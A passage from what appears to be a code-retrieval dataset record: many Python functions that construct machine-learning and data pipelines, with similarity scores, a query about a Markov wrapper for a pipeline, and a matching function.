Pipeline(\n screen=symbol_filter, # & (daily_classifier > 0),\n columns={\n 'daily_classifier': daily_classifier,\n 'daily_high': USEquityPricing.high.latest,\n 'daily_low': USEquityPricing.low.latest,\n 'weekly_classifier': weekly_classifier,\n 'weekly_high': weekly_high,\n 'weekly_low': weekly_low\n }\n )\n return pipe", "def run_pipeline(\n pipeline: Pipeline,\n start_date: str,\n end_date: str = None,\n bundle: str = None\n ) -> pd.DataFrame:\n return _run_pipeline(\n pipeline,\n start_date=start_date,\n end_date=end_date,\n bundle=bundle)", "def __init__(self, pipeline, config=None):\n self.config = config\n self.pipeline = pipeline", "def to_larva(self, pipeline=True) -> None:\n if \"-larva\" in sys.argv and pipeline:\n file_write(pipe_path(\"larva\"), self.build(), \"a\")\n else:\n print(self.build())", "def pipeline(self, transaction=True, shard_hint=None):\n p = Pipeline(\n connection_pool=self.connection_pool,\n response_callbacks=self.response_callbacks,\n transaction=transaction,\n shard_hint=shard_hint)\n return p", "def from_yaml(cls, path: str) -> \"Pipeline\":\n pipeline_configuration = PipelineConfiguration.from_yaml(path)\n\n return cls.from_config(pipeline_configuration)", "def build_logistic_regr():\n logistic_pipeline = None\n ##### Write code here #######\n logistic_pipeline = Pipeline([\n ('vect', CountVectorizer()),\n ('clf', LogisticRegression())\n ])\n ##### End of your work ######\n return logistic_pipeline", "def make_full_pipeline(\n preprocess_pipe: ColumnTransformer, model: BaseEstimator\n) -> Pipeline:\n full_pipe = sklearn.pipeline.Pipeline(\n [(\"preprocess\", preprocess_pipe), (\"model\", model)]\n )\n return full_pipe", "def create_pipelines_lingspam():\n stop = ('stop', StopWordRemovalTransformer())\n lemma = ('lemma', LemmatizeTransformer())\n binz = ('binarizer', CountVectorizer())\n we = ('document embedding', DocEmbeddingVectorizer())\n sel = ('fsel', SelectKBest(score_func=mutual_info_classif, k=100))\n clf = ('cls', BernoulliNB()) # Binary features in the original paper. \n return Pipeline([binz, sel, clf]), \\\n Pipeline([stop, binz, sel, clf]), \\\n Pipeline([lemma, binz, sel, clf]), \\\n Pipeline([stop, lemma, binz, sel, clf]), \\\n Pipeline([stop, lemma, we, sel, clf])", "def make_labels_pipeline(self, dataset, return_epochs=False, return_raws=False):\n if return_epochs:\n labels_pipeline = make_pipeline(\n EpochsToEvents(),\n EventsToLabels(event_id=self.used_events(dataset)),\n )\n elif return_raws:\n labels_pipeline = make_pipeline(\n self._get_events_pipeline(dataset),\n EventsToLabels(event_id=self.used_events(dataset)),\n )\n else: # return array\n labels_pipeline = EventsToLabels(event_id=self.used_events(dataset))\n return labels_pipeline", "def getPipeline(self, region: str, polygon: Polygon):\n boundaries, polygon_input = self.getPolygonBoundaries(polygon)\n\n full_dataset_path = f\"{self.public_data_url}{region}/ept.json\"\n\n self.pipeline_json['pipeline'][0]['filename'] = full_dataset_path\n self.pipeline_json['pipeline'][0]['bounds'] = boundaries\n self.pipeline_json['pipeline'][1]['polygon'] = polygon_input\n self.pipeline_json['pipeline'][3]['out_srs'] = f'EPSG:{self.output_epsg}'\n\n pipeline = pdal.Pipeline(json.dumps(self.pipeline_json))\n\n return pipeline", "def make_pipeline():\r\n base_universe = Q1500US()\r\n sector = Sector() \r\n # screen is based off of returns\r\n returns = Returns(window_length = 2)\r\n # check if stock price has good strength, but not necessarily overbought\r\n rsi = RSI() \r\n price = USEquityPricing.close.latest\r\n # creating filter by specifying the type of returns desired\r\n top_return_stocks = returns.top(1,mask=base_universe, groupby=sector)\r\n pipe = Pipeline(\r\n columns = {\r\n 'rsi': rsi,\r\n 'price': price\r\n },\r\n # filter top return stocks, and stocks that are not being overbought\r\n # but are not too oversold either\r\n screen = base_universe & top_return_stocks & (20 < rsi < 80)\r\n # the above is equivalent to: choose stocks from the base universe that have had the top returns in their sectors and have a good RSI value\r\n )\r\n return pipe", "def build_own_pipeline() -> Pipeline:\n nn_pipeline = None\n\n nn_pipeline = Pipeline([\n ('vect', CountVectorizer()),\n ('tfidf', TfidfTransformer()),\n ('clf', MLPClassifier()) \n ])\n \n return nn_pipeline", "def get_delivery_pipeline(\n self,\n ) -> Callable[\n [cloud_deploy.GetDeliveryPipelineRequest], cloud_deploy.DeliveryPipeline\n ]:\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"get_delivery_pipeline\" not in self._stubs:\n self._stubs[\"get_delivery_pipeline\"] = self.grpc_channel.unary_unary(\n \"/google.cloud.deploy.v1.CloudDeploy/GetDeliveryPipeline\",\n request_serializer=cloud_deploy.GetDeliveryPipelineRequest.serialize,\n response_deserializer=cloud_deploy.DeliveryPipeline.deserialize,\n )\n return self._stubs[\"get_delivery_pipeline\"]", "def get_pipeline(\n region: str,\n role: str,\n pipeline_name: str,\n default_bucket: str,\n base_job_prefix: str,\n lambda_role_arn: str,\n data_uri: str,\n model_uri: str,\n transform_uri: str,\n baseline_uri: str = None,\n) -> Pipeline:\n sagemaker_session = get_session(region, default_bucket)\n\n # parameters for pipeline execution\n input_data_uri = ParameterString(\n name=\"DataInputUri\",\n default_value=data_uri,\n )\n input_model_uri = ParameterString(\n name=\"ModelInputUri\",\n default_value=model_uri,\n )\n output_transform_uri = ParameterString(\n name=\"TransformOutputUri\",\n default_value=transform_uri,\n )\n transform_instance_count = ParameterInteger(\n name=\"TransformInstanceCount\", default_value=1\n )\n transform_instance_type = ParameterString(\n name=\"TransformInstanceType\", default_value=\"ml.m5.xlarge\"\n )\n monitor_instance_count = ParameterInteger(\n name=\"MonitorInstanceCount\", default_value=1\n )\n monitor_instance_type = ParameterString(\n name=\"MonitorInstanceType\", default_value=\"ml.m5.xlarge\"\n )\n\n # Create cache configuration (Unable to pass parameter for expire_after value)\n cache_config = CacheConfig(enable_caching=True, expire_after=\"PT1H\")\n\n # Create the Model step\n image_uri_inference = sagemaker.image_uris.retrieve(\n framework=\"xgboost\",\n region=region,\n version=\"1.2-2\",\n py_version=\"py3\",\n instance_type=transform_instance_type,\n )\n\n model = Model(\n image_uri=image_uri_inference,\n model_data=input_model_uri,\n sagemaker_session=sagemaker_session,\n role=role,\n )\n\n inputs_model = CreateModelInput(instance_type=transform_instance_type)\n\n step_create_model = CreateModelStep(\n name=\"CreateModel\", model=model, inputs=inputs_model\n )\n\n # processing step for evaluation\n script_eval = ScriptProcessor(\n image_uri=image_uri_inference,\n command=[\"python3\"],\n instance_count=transform_instance_count,\n instance_type=transform_instance_type,\n base_job_name=f\"{base_job_prefix}/script-score\",\n sagemaker_session=sagemaker_session,\n role=role,\n )\n\n step_score = ProcessingStep(\n name=\"ScoreModel\",\n processor=script_eval,\n inputs=[\n ProcessingInput(\n source=input_model_uri,\n destination=\"/opt/ml/processing/model\",\n ),\n ProcessingInput(\n source=input_data_uri,\n destination=\"/opt/ml/processing/input\",\n ),\n ],\n outputs=[\n ProcessingOutput(output_name=\"scores\", source=\"/opt/ml/processing/output\"),\n ],\n code=os.path.join(BASE_DIR, \"score.py\"),\n cache_config=cache_config,\n )\n step_score.add_depends_on([step_create_model])\n\n steps = [step_create_model, step_score]\n\n if baseline_uri is not None:\n # Get the default model monitor container\n model_monitor_container_uri = sagemaker.image_uris.retrieve(\n framework=\"model-monitor\",\n region=region,\n version=\"latest\",\n )\n\n # Create the baseline job using\n dataset_format = DatasetFormat.csv()\n env = {\n \"dataset_format\": json.dumps(dataset_format),\n \"dataset_source\": \"/opt/ml/processing/input/baseline_dataset_input\",\n \"output_path\": \"/opt/ml/processing/output\",\n \"publish_cloudwatch_metrics\": \"Disabled\",\n \"baseline_constraints\": \"/opt/ml/processing/baseline/constraints/constraints.json\",\n \"baseline_statistics\": \"/opt/ml/processing/baseline/stats/statistics.json\",\n }\n\n monitor_analyzer = Processor(\n image_uri=model_monitor_container_uri,\n role=role,\n instance_count=monitor_instance_count,\n instance_type=monitor_instance_type,\n base_job_name=f\"{base_job_prefix}/monitoring\",\n sagemaker_session=sagemaker_session,\n max_runtime_in_seconds=1800,\n env=env,\n )\n\n step_monitor = ProcessingStep(\n name=\"ModelMonitor\",\n processor=monitor_analyzer,\n inputs=[\n ProcessingInput(\n source=step_score.properties.ProcessingOutputConfig.Outputs[\n \"scores\"\n ].S3Output.S3Uri,\n destination=\"/opt/ml/processing/input/baseline_dataset_input\",\n input_name=\"baseline_dataset_input\",\n ),\n ProcessingInput(\n source=os.path.join(baseline_uri, \"constraints.json\"),\n destination=\"/opt/ml/processing/baseline/constraints\",\n input_name=\"constraints\",\n ),\n ProcessingInput(\n source=os.path.join(baseline_uri, \"statistics.json\"),\n destination=\"/opt/ml/processing/baseline/stats\",\n input_name=\"baseline\",\n ),\n ],\n outputs=[\n ProcessingOutput(\n source=\"/opt/ml/processing/output\",\n output_name=\"monitoring_output\",\n ),\n ],\n cache_config=cache_config,\n )\n\n # Create an inline lambda step that inspects the output of the model monitoring\n step_lambda = LambdaStep(\n name=\"EvaluateDrift\",\n lambda_func=Lambda(\n function_name=f\"sagemaker-{pipeline_name}\", # Must be <64 characters\n execution_role_arn=lambda_role_arn,\n script=os.path.join(BASE_DIR, \"../lambda/lambda_evaluate_drift.py\"),\n handler=\"lambda_evaluate_drift.lambda_handler\",\n ),\n inputs={\n \"ProcessingJobName\": step_monitor.properties.ProcessingJobName,\n \"PipelineName\": pipeline_name,\n },\n outputs=[\n LambdaOutput(\n output_name=\"statusCode\", output_type=LambdaOutputTypeEnum.Integer\n )\n ],\n )\n\n steps += [step_monitor, step_lambda]\n\n # pipeline instance\n pipeline = Pipeline(\n name=pipeline_name,\n parameters=[\n input_data_uri,\n input_model_uri,\n output_transform_uri,\n transform_instance_count,\n transform_instance_type,\n monitor_instance_count,\n monitor_instance_type,\n ],\n steps=steps,\n sagemaker_session=sagemaker_session,\n )\n\n return pipeline", "def forward_transform(self):\n\n if self._pipeline:\n #return functools.reduce(lambda x, y: x | y, [step[1] for step in self._pipeline[: -1]])\n return functools.reduce(lambda x, y: x | y, [step.transform for step in self._pipeline[:-1]])\n else:\n return None", "def build_own_pipeline() -> Pipeline:\n clf = svm.LinearSVC(C=2, loss='hinge')\n vect = TfidfVectorizer(ngram_range=(1, 2))\n\n pipeline = None\n ##### Write code here #######\n pipeline = Pipeline([\n ('vect', vect),\n ('tfidf', TfidfTransformer()),\n ('clf', clf)\n ])\n ##### End of your work ######\n return pipeline", "def cli(ctx, pipeline, folder, branch):\n if len(pipeline.split('/')) != 3:\n raise BadArgumentUsage(\n \"Bad pipeline name. See 'popper add --help' for more info.\")\n\n owner, repo, pipe_name = pipeline.split('/')\n\n new_pipe_name, folder = pu.get_name_and_path_for_new_pipeline(\n folder, pipe_name)\n\n config = pu.read_config()\n\n if new_pipe_name in config['pipelines']:\n pu.fail(\"Pipeline {} already in repo.\".format(new_pipe_name))\n\n project_root = pu.get_project_root()\n\n pipelines_dir = os.path.join(project_root, folder)\n\n gh_url = 'https://github.com/{}/{}/'.format(owner, repo)\n gh_url += 'archive/{}.tar.gz'.format(branch)\n\n pu.info(\n \"Downloading pipeline {} as {}...\".format(pipe_name, new_pipe_name)\n )\n\n try:\n # Downloading and extracting the tarfile\n r = pu.make_gh_request(\n gh_url,\n msg=\"Unable to fetch the pipeline. Please check if the name\"\n \" of the pipeline is correct and the internet is connected\"\n )\n with tarfile.open(mode='r:gz', fileobj=BytesIO(r.content)) as t:\n t.extractall()\n\n if not os.path.exists(pipelines_dir):\n try:\n os.makedirs(pipelines_dir)\n except (OSError, IOError):\n pu.fail(\"Could not create the necessary path.\\n\")\n elif len(os.listdir(pipelines_dir)) != 0:\n pu.fail(\"The path already exists and is not empty.\")\n\n except ConnectionError:\n pu.fail(\"Could not download the pipeline due to Connection Error\")\n\n try:\n os.rename('{}-{}/pipelines/{}'.format(\n repo, branch, pipe_name), pipelines_dir)\n except OSError:\n pu.fail(\n \"Could not rename {} to {}.\".format(\n '{}-{}/pipelines/{}'.format(repo, branch, pipe_name),\n pipelines_dir\n )\n )\n finally:\n shutil.rmtree('{}-{}'.format(repo, branch))\n\n pu.info(\"Updating popper configuration... \")\n\n repo_config = get_config(owner, repo)\n\n config['pipelines'][new_pipe_name] = repo_config['pipelines'][pipe_name]\n config['pipelines'][new_pipe_name]['path'] = folder\n\n pu.write_config(config)\n pu.info(\n \"Pipeline {} has been added successfully.\".format(new_pipe_name),\n fg=\"green\"\n )", "def get_non_refinement_pipeline():\n node_scaling = PrimaryNode('scaling')\n node_rf = SecondaryNode('rf', nodes_from=[node_scaling])\n node_logit = SecondaryNode('logit', nodes_from=[node_scaling])\n node_xgboost = SecondaryNode('xgboost', nodes_from=[node_logit, node_rf])\n pipeline = Pipeline(node_xgboost)\n return pipeline", "def create_pipeline(\n pipeline_name: Text,\n pipeline_root: Text,\n data_root: Text,\n module_file: Text,\n metadata_path: Text,\n beam_pipeline_args: List[Text],\n) -> tfx.dsl.Pipeline:\n example_gen = tfx.components.CsvExampleGen(input_base=data_root)\n\n # Computes statistics over data for visualization and example validation.\n statistics_gen = tfx.components.StatisticsGen(\n examples=example_gen.outputs['examples'])\n\n # Generates schema based on statistics files.\n schema_gen = tfx.components.SchemaGen(\n statistics=statistics_gen.outputs['statistics'],\n infer_feature_shape=True)\n\n # Performs anomaly detection based on statistics and data schema.\n example_validator = tfx.components.ExampleValidator(\n statistics=statistics_gen.outputs['statistics'],\n schema=schema_gen.outputs['schema'],\n )\n\n trainer_custom_config = {\n 'objective': 'reg:squarederror',\n 'learning_rate': 0.3,\n 'max_depth': 4,\n 'num_boost_round': 200,\n 'early_stopping_rounds': 40,\n }\n\n trainer = tfx.components.Trainer(\n module_file=module_file,\n examples=example_gen.outputs['examples'],\n schema=schema_gen.outputs['schema'],\n train_args=tfx.proto.TrainArgs(),\n eval_args=tfx.proto.EvalArgs(),\n custom_config=trainer_custom_config,\n )\n\n return tfx.dsl.Pipeline(\n pipeline_name=pipeline_name,\n pipeline_root=pipeline_root,\n components=[\n example_gen,\n statistics_gen,\n schema_gen,\n example_validator,\n trainer,\n ],\n enable_cache=True,\n metadata_connection_config=tfx.orchestration.metadata.\n sqlite_metadata_connection_config(metadata_path),\n beam_pipeline_args=beam_pipeline_args,\n )", "def load_pipeline():\n\n try:\n logging.info(\"Loading the fitted pipeline...\")\n with open(base.SAVED_MODEL_PATH, \"rb\") as model_file:\n pipeline = pickle.load(model_file)\n logging.info(\"Loading completed successfully...\")\n except FileNotFoundError:\n logging.error(\"Model file has not been found.\")\n raise\n return pipeline", "def make_lag(self,inputLabels,lagNum,suffix=None,fillMissing=np.nan,verbose=0,n_jobs=1):\n self._transform_wrapper(\n inputLabels,\n None,\n make_lag,\n suffix,\n lagNum,\n False,\n n_jobs,\n verbose,\n lagNum=lagNum,\n fillMissing=fillMissing\n )\n return self", "def get_default_pipeline(localizer_threshold=None, verbose=False):\n import pipeline\n import pipeline.pipeline\n import pipeline.objects\n \n outputs = [pipeline.objects.PipelineResult]\n if verbose:\n outputs += [pipeline.objects.CrownOverlay]\n conf = pipeline.pipeline.get_auto_config()\n if localizer_threshold is not None:\n conf['Localizer']['threshold_tag'] = localizer_threshold\n decoder_pipeline = pipeline.Pipeline([pipeline.objects.Image], # inputs\n outputs, # outputs\n **conf)\n return decoder_pipeline", "def get_pipeline(features, to_matrix=True):\n feature_names = []\n for feature in features:\n feature_names += feature[1].FEATS\n if to_matrix:\n return Pipeline(features + [('transform', ToMatrix(features=feature_names)), ('norm', MinMaxScaler())])\n else:\n return Pipeline(features)", "def pipe(self, func, *args, **kwargs):\n return func(self, *args, **kwargs)", "def pipeline(self, *funcs) -> \"fn\":\n return self._mod.pipeline(self, *funcs)", "def _getPipeline( self, plsPath ):\n plsH5 = h5py.File( plsPath, \"r\" )\n if \"PulseData\" not in plsH5 or \\\n \"BaseCalls\" not in plsH5[\"/PulseData\"] or \\\n \"ChangeListID\" not in plsH5[\"/PulseData/BaseCalls/\"].attrs:\n raise PBCmpH5MetaDataError, \\\n \"Unable to locate /PulseData/BaseCalls/ChangeListID in pls file (%s).\" % plsPath\n pipeline = plsH5[\"/PulseData/BaseCalls/\"].attrs[\"ChangeListID\"][ 0 ]\n plsH5.close()\n return str(pipeline)", "def pipeline_ml_factory(\n training: Pipeline,\n inference: Pipeline,\n input_name: str = None,\n conda_env: Optional[Union[str, Path, Dict[str, Any]]] = None,\n model_name: Optional[str] = \"model\",\n model_signature: Union[ModelSignature, str, None] = \"auto\",\n **kwargs\n) -> PipelineML:\n\n pipeline = PipelineML(\n nodes=training.nodes,\n inference=inference,\n input_name=input_name,\n conda_env=conda_env,\n model_name=model_name,\n model_signature=model_signature,\n **kwargs\n )\n return pipeline", "def create(self, params):\n return self.make_client_call('create_pipeline', params)", "def trace_pipeline(pipe):\n _patch_multi_exec_execute(pipe)", "def __call__(self, *pipeline_factories, exceptions=None, wait=True):\n return self.run(*pipeline_factories, exceptions=exceptions, wait=wait)", "def crm_pipelines(self):\n from hubspot3.crm_pipelines import PipelinesClient\n\n return PipelinesClient(**self.auth, **self.options)", "def load_pipeline(file_path: str) -> PreprocessingPipeline:\n pipeline = joblib.load(file_path)\n return pipeline", "def get_cb_pipeline(train):\n from src.features import alchemy_feat, counting_feat, nltk_feat\n features = [\n ('sentiment', alchemy_feat.Sentiment()),\n ('sent_len', counting_feat.SentenceLength()),\n ('tfidf', counting_feat.BagOfTfIDF(train)),\n ('ner', alchemy_feat.NER()),\n ('pos', nltk_feat.POS())\n ]\n return get_pipeline(features)", "def stages(self):\r\n return pipelines.Stages(self)", "def _create_pipeline(self) -> TfmIterator:\n # 1. Initialise TubRecord -> x, y transformations\n def get_x(record: TubRecord) -> Dict[str, Union[float, np.ndarray]]:\n \"\"\" Extracting x from record for training\"\"\"\n out_dict = self.model.x_transform(record, self.image_processor)\n # apply the normalisation here on the fly to go from uint8 -> float\n out_dict['img_in'] = normalize_image(out_dict['img_in'])\n return out_dict\n\n def get_y(record: TubRecord) -> Dict[str, Union[float, np.ndarray]]:\n \"\"\" Extracting y from record for training \"\"\"\n y = self.model.y_transform(record)\n return y\n\n # 2. Build pipeline using the transformations\n pipeline = self.sequence.build_pipeline(x_transform=get_x,\n y_transform=get_y)\n return pipeline", "def get_pipelines() -> Iterable[DataPipeline]:\n for pipeline_name in get_pipeline_names():\n yield DataPipeline.load(pipeline_name)", "def get_event_log(pipeline_context: PipelineContext = None) \\\n -> logging.Logger:\n pipeline_event_log = logging.getLogger(TIMELINE_EVENT_LOGGER_NAME)\n # wrap logger in an adapter that carries pipeline context\n # such as pipeline name and current pipe element.\n pipeline_event_log = logging.LoggerAdapter(\n pipeline_event_log,\n {PIPELINE_CONTEXT_KEY: pipeline_context})\n return pipeline_event_log", "def read(cls):\n return PipelineJavaMLReader(cls, \"com.ibm.analytics.wml.pipeline.spark.MLPipeline\")", "def make_pipeline():\r\n\r\n mkt_cap_screen = (morningstar.valuation.market_cap.latest > 1e9)\r\n\r\n return Pipeline(\r\n columns={\r\n 'Free Cash Flow': morningstar.cash_flow_statement.free_cash_flow.latest,\r\n }, screen=mkt_cap_screen)", "def load_pipeline(lang=None, split_affixes=True):\n global _load_pipeline\n if lang is None:\n lang = 'es_core_news_md'\n if lang not in _load_pipeline:\n nlp = spacy.load(lang)\n nlp.remove_pipe(\"ner\") if nlp.has_pipe(\"ner\") else None\n nlp.tokenizer = custom_tokenizer(nlp)\n if split_affixes:\n nlp.remove_pipe(\"affixes\") if nlp.has_pipe(\"affixes\") else None\n suffixes = {k: v for k, v in load_affixes().items() if\n k.startswith(AFFIXES_SUFFIX)}\n affixes_matcher = AffixesMatcher(nlp, split_on=[\"VERB\", \"AUX\"],\n rules=suffixes)\n nlp.add_pipe(affixes_matcher, name=\"affixes\", first=True)\n _load_pipeline[lang] = nlp\n return _load_pipeline[lang]", "def create_delivery_pipeline(\n self,\n ) -> Callable[\n [cloud_deploy.CreateDeliveryPipelineRequest], operations_pb2.Operation\n ]:\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"create_delivery_pipeline\" not in self._stubs:\n self._stubs[\"create_delivery_pipeline\"] = self.grpc_channel.unary_unary(\n \"/google.cloud.deploy.v1.CloudDeploy/CreateDeliveryPipeline\",\n request_serializer=cloud_deploy.CreateDeliveryPipelineRequest.serialize,\n response_deserializer=operations_pb2.Operation.FromString,\n )\n return self._stubs[\"create_delivery_pipeline\"]", "def _instantiate_pipeline(self, pipeline_url, input_file, output_file, params):\n pipeline_resource = self.bqSession.fetchxml(pipeline_url, view='short')\n out_pipeline_file = os.path.join(self.options.stagingPath, 'pipeline.json')\n out_error_file = os.path.join(self.options.stagingPath, 'dream3d_error.txt')\n pipeline_url = self.bqSession.service_url('blob_service', path=pipeline_resource.get('resource_uniq'))\n self.bqSession.fetchblob(pipeline_url, path=os.path.join(self.options.stagingPath, 'pipeline_uninit.json'))\n pipeline_file = os.path.join(self.options.stagingPath, 'pipeline_uninit.json')\n with open(pipeline_file, 'r') as fi:\n pipeline = json.load(fi)\n # replace all placeholders in pipeline template\n _replace_placeholders(pipeline, input_file, output_file, params)\n # write out pipeline to provided file\n with open(out_pipeline_file, 'w') as fo:\n json.dump(pipeline, fo)\n return out_pipeline_file, out_error_file", "def create_pipeline(pipeline_name: Text, \n pipeline_root: Text, \n dataset_name: Text,\n train_steps: data_types.RuntimeParameter,\n eval_steps: data_types.RuntimeParameter,\n accuracy_threshold: data_types.RuntimeParameter,\n ai_platform_training_args: Dict[Text, Text],\n ai_platform_serving_args: Dict[Text, Text],\n beam_pipeline_args: List[Text],\n model_regisrty_uri: Text,\n enable_cache: Optional[bool] = False) -> pipeline.Pipeline:\n\n # Dataset, table and/or 'where conditions' can be passed as pipeline args.\n query=sql_utils.generate_source_query(dataset_name=dataset_name)\n \n # Brings data into the pipeline from BigQuery.\n example_gen = tfx.components.BigQueryExampleGen(\n query=query\n )\n\n # Computes statistics over data for visualization and example validation.\n statistics_gen = tfx.components.StatisticsGen(\n input_data=example_gen.outputs.examples)\n\n # Import schema from local directory.\n schema_importer = ImporterNode(\n instance_name='RawSchemaImporter',\n source_uri=RAW_SCHEMA_DIR,\n artifact_type=Schema,\n )\n\n # Performs anomaly detection based on statistics and data schema.\n validate_stats = tfx.components.ExampleValidator(\n stats=statistics_gen.outputs.output, \n schema=schema_importer.outputs.result\n )\n\n # Performs transformations and feature engineering in training and serving.\n transform = tfx.components.Transform(\n input_data=example_gen.outputs.examples,\n schema=schema_importer.outputs.result,\n module_file=TRANSFORM_MODULE_FILE\n )\n\n\n # Get the latest blessed model for model validation.\n latest_model_resolver = tfx.components.ResolverNode(\n instance_name='latest_blessed_model_resolver',\n resolver_class=latest_blessed_model_resolver.LatestBlessedModelResolver,\n model=Channel(type=Model),\n model_blessing=Channel(type=ModelBlessing)\n )\n \n # Train and save model for evaluation and serving.\n trainer = tfx.components.Trainer(\n# custom_executor_spec=executor_spec.ExecutorClassSpec(\n# ai_platform_trainer_executor.GenericExecutor),\n custom_executor_spec=executor_spec.ExecutorClassSpec(\n trainer_executor.GenericExecutor),\n module_file=TRAIN_MODULE_FILE,\n transformed_examples=transform.outputs.transformed_examples,\n schema=schema_importer.outputs.result,\n transform_output=transform.outputs.transform_output,\n base_model=latest_model_resolver.outputs.model,\n train_args={'num_steps': train_steps},\n eval_args={'num_steps': eval_steps},\n custom_config={'ai_platform_training_args': ai_platform_training_args}\n )\n\n\n # Uses TFMA to compute a evaluation statistics over features of a model.\n model_evaluator = tfx.components.Evaluator(\n examples=example_gen.outputs.examples,\n model=trainer.outputs.model,\n baseline_model=latest_model_resolver.outputs.model,\n eval_config=helper.get_eval_config()\n )\n \n # Use a custom AccuracyModelValidator component to validate the model.\n model_validator = AccuracyModelValidator(\n eval_results=model_evaluator.outputs.output,\n model=trainer.outputs.model,\n accuracy_threshold=accuracy_threshold,\n slice_accuracy_tolerance=0.15,\n )\n\n# # Checks whether the model passed the validation steps and pushes the model\n# # to its destination if check passed.\n# pusher = tfx.components.Pusher(\n# custom_executor_spec=executor_spec.ExecutorClassSpec(\n# ai_platform_pusher_executor.Executor),\n# model_export=trainer.outputs.output,\n# model_blessing=model_evaluator.outputs.blessing,\n# #model_blessing=model_validator.outputs.blessing,\n# custom_config={'ai_platform_serving_args': ai_platform_serving_args}\n# )\n \n register = tfx.components.Pusher(\n model=trainer.outputs.model,\n model_blessing=model_validator.outputs.blessing,\n #model_blessing=model_evaluator.outputs.blessing,\n push_destination=tfx.proto.pusher_pb2.PushDestination(\n filesystem=tfx.proto.pusher_pb2.PushDestination.Filesystem(\n base_directory=os.path.join(model_regisrty_uri, pipeline_name)))\n )\n \n return pipeline.Pipeline(\n pipeline_name=pipeline_name,\n pipeline_root=pipeline_root,\n components=[\n example_gen, \n statistics_gen, \n schema_importer, \n validate_stats,\n latest_model_resolver,\n transform,\n trainer, \n model_evaluator, \n model_validator, \n #pusher\n register\n ],\n enable_cache=enable_cache,\n beam_pipeline_args=beam_pipeline_args)", "def run(self):\n self.pipeline = self.set_pipeline()\n self.pipeline.fit(self.X,self.y)\n return self", "def from_crawler(cls, crawler, *args, **kwargs):\n pipeline = cls()\n crawler.signals.connect(pipeline.handle_list_of_items, signal=signals.spider_idle)\n return pipeline" ]
[ "0.614468", "0.5957362", "0.59200114", "0.58368886", "0.5657546", "0.54006594", "0.53980225", "0.53207415", "0.53056926", "0.53035724", "0.5302075", "0.52976626", "0.5268746", "0.52655923", "0.5263156", "0.52361935", "0.52361935", "0.52285284", "0.52276915", "0.5182775", "0.5180908", "0.51678705", "0.51635337", "0.5153052", "0.51524246", "0.5142166", "0.51246774", "0.51197654", "0.5113149", "0.511194", "0.5104858", "0.51006997", "0.5093101", "0.50922614", "0.50916725", "0.5089654", "0.50634575", "0.50619864", "0.5025697", "0.502348", "0.50215673", "0.49903247", "0.49899748", "0.49853757", "0.4984778", "0.49837482", "0.49501458", "0.49446788", "0.4939628", "0.49262187", "0.49092692", "0.49090916", "0.4905714", "0.48802683", "0.48635176", "0.4863481", "0.4861578", "0.48557597", "0.48514456", "0.48383343", "0.48198706", "0.48115602", "0.4802581", "0.4797253", "0.47926536", "0.47833198", "0.47800627", "0.477266", "0.4752981", "0.4748997", "0.4739656", "0.47387978", "0.47297984", "0.4722632", "0.4721616", "0.47190252", "0.47128612", "0.47086492", "0.47059423", "0.46978447", "0.4690289", "0.46898696", "0.46870583", "0.4683998", "0.46803686", "0.4678477", "0.46721867", "0.46498948", "0.46420473", "0.46386892", "0.46275672", "0.4618949", "0.4604689", "0.4602003", "0.46008688", "0.45889622", "0.45847243", "0.4578368", "0.45737544", "0.45734915" ]
0.8226096
0
Return a markov wrapper for a pipeline.
def get_markov_wrapper(pipe, kwargs): from .transforms import MarkovWrapper return MarkovWrapper(pipe, **kwargs)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def build_own_pipeline() -> Pipeline:\n clf = svm.LinearSVC(C=2, loss='hinge')\n vect = TfidfVectorizer(ngram_range=(1, 2))\n\n pipeline = None\n ##### Write code here #######\n pipeline = Pipeline([\n ('vect', vect),\n ('tfidf', TfidfTransformer()),\n ('clf', clf)\n ])\n ##### End of your work ######\n return pipeline", "def build_own_pipeline() -> Pipeline:\n nn_pipeline = None\n\n nn_pipeline = Pipeline([\n ('vect', CountVectorizer()),\n ('tfidf', TfidfTransformer()),\n ('clf', MLPClassifier()) \n ])\n \n return nn_pipeline", "def create_pipelines_lingspam():\n stop = ('stop', StopWordRemovalTransformer())\n lemma = ('lemma', LemmatizeTransformer())\n binz = ('binarizer', CountVectorizer())\n we = ('document embedding', DocEmbeddingVectorizer())\n sel = ('fsel', SelectKBest(score_func=mutual_info_classif, k=100))\n clf = ('cls', BernoulliNB()) # Binary features in the original paper. \n return Pipeline([binz, sel, clf]), \\\n Pipeline([stop, binz, sel, clf]), \\\n Pipeline([lemma, binz, sel, clf]), \\\n Pipeline([stop, lemma, binz, sel, clf]), \\\n Pipeline([stop, lemma, we, sel, clf])", "def pipeline(args) :\n from pipeliner import create_pipeline\n create_pipeline(args)", "def create_pipeline_for_kfold(self, args):\n return ClassificationPipeline(args=args)", "def test_generate_pipeline_code():\n pipeline = ['KNeighborsClassifier',\n ['CombineDFs',\n ['GradientBoostingClassifier',\n 'input_matrix',\n 38.0,\n 0.87],\n ['GaussianNB',\n ['ZeroCount',\n 'input_matrix']]],\n 18,\n 33]\n\n expected_code = \"\"\"make_pipeline(\n make_union(\n make_union(VotingClassifier([('branch',\n GradientBoostingClassifier(learning_rate=1.0, max_features=1.0, n_estimators=500)\n )]), FunctionTransformer(lambda X: X)),\n make_union(VotingClassifier([('branch',\n make_pipeline(\n ZeroCount(),\n GaussianNB()\n )\n )]), FunctionTransformer(lambda X: X))\n ),\n KNeighborsClassifier(n_neighbors=5, weights=\"distance\")\n)\"\"\"\n\n assert expected_code == generate_pipeline_code(pipeline)", "def make_pipeline(model):\n\n steps = [\n (\"imp\", SimpleImputer(strategy=\"most_frequent\")),\n (\"norm\", MinMaxScaler()),\n (\"reg\", model)\n ]\n pipeline = Pipeline(steps=steps)\n\n return pipeline", "def create_fake_pipeline(*_args, **_kwargs):\n return Pipeline(\n [\n node(match.clean_match_data, \"fake_match_data\", \"clean_match_data\"),\n node(\n common.convert_match_rows_to_teammatch_rows,\n \"clean_match_data\",\n \"match_data_b\",\n ),\n node(match.add_out_of_state, \"match_data_b\", \"match_data_c\"),\n node(match.add_travel_distance, \"match_data_c\", \"match_data_d\"),\n node(match.add_result, \"match_data_d\", \"match_data_e\"),\n node(match.add_margin, \"match_data_e\", \"match_data_f\"),\n node(\n match.add_shifted_team_features(\n shift_columns=[\n \"score\",\n 